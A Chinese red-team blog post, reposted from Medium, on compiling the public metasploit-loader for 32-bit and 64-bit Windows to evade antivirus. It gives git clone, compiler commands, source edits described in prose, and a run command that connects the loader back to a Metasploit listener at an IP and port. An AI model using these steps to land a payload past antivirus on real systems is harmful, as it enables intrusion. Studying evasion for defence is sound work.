1. 首页
  2. 红队技术

通过MSF加载器绕过AV

文章转自:

https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad

https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8

PS:这个metasploit-loader是8年前的东西了,我测试了下32位的,被杀很多,不像原作者说的全免杀,不知道是不是伪造的,64位的能过一些,随机应变吧

32位

git clone https://github.com/rsmudge/metasploit-loader.git

通过MSF加载器绕过AV

编辑metasploit-loader/master/src/main.c在main函数中,注释93-98行,修改99行如下

通过MSF加载器绕过AV

使用MinGW编译
i686-w64-mingw32-gccmain.c -o loadmeta.exe -lws2_32

通过MSF加载器绕过AV
通过MSF加载器绕过AV

执行

通过MSF加载器绕过AV

64位

使用Dev C ++工具编译

https://sourceforge.net/projects/orwelldevcpp/

通过MSF加载器绕过AV

确保安装完整,同时拥有32和64位

通过MSF加载器绕过AV

新建一个Project Loader64并将文件另存为Loader64。

将Project设置为C Project,将应用程序设置为Console Application。从命令行执行

通过MSF加载器绕过AV

https://github.com/rsmudge/metasploit-loader/blob/master/src/main.c

粘贴进去

修改以下内容

通过MSF加载器绕过AV

把#include <winsocks2.h>放在windows.h上面

通过MSF加载器绕过AV

编译选项中添加-lws2_32

通过MSF加载器绕过AV

F9编译

MSF监听

通过MSF加载器绕过AV

Windows上执行 Loader64.exe 192.168.137.128 9500

通过MSF加载器绕过AV
通过MSF加载器绕过AV

本文来自https://mp.weixin.qq.com/s/FnV5DhZZLESEFwyJXz4w6w,经授权后发布,本文观点不代表立场,转载请联系原作者。

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息